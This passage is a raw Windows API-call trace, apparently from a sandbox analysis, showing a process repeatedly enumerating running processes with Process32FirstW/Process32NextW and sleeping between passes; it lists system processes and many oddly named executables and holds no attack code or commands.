lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 
[0110.782] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0110.782] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0110.783] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0110.784] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0110.784] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0110.785] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0110.786] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0110.787] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0110.787] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.788] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.789] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.789] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.790] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.790] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0110.791] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.792] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.792] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0110.794] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.795] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0110.796] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0110.797] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0110.798] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0110.799] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.801] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0110.802] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0110.803] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0110.805] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0110.806] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="xplivecam.exe")) returned 1 [0110.807] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0110.808] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0110.809] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0110.811] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0110.812] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0110.813] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0110.814] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, 
dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0110.815] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0110.817] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0110.819] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0110.820] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0110.821] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0110.822] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0110.824] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0110.825] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0110.826] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0110.827] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.828] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0110.829] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0110.830] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0110.831] CloseHandle (hObject=0xbc) returned 1 [0110.831] Sleep (dwMilliseconds=0x12c) [0111.131] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0111.136] 
Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0111.137] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0111.138] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0111.139] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0111.139] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0111.140] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0111.141] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0111.142] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0111.143] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0111.143] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0111.144] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.145] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.145] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.146] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.147] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.147] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0111.148] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.149] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.149] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0111.150] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.151] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0111.153] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0111.154] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0111.155] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0111.156] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.158] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0111.159] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0111.161] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0111.162] 
Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0111.163] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0111.164] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0111.165] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0111.166] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0111.167] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 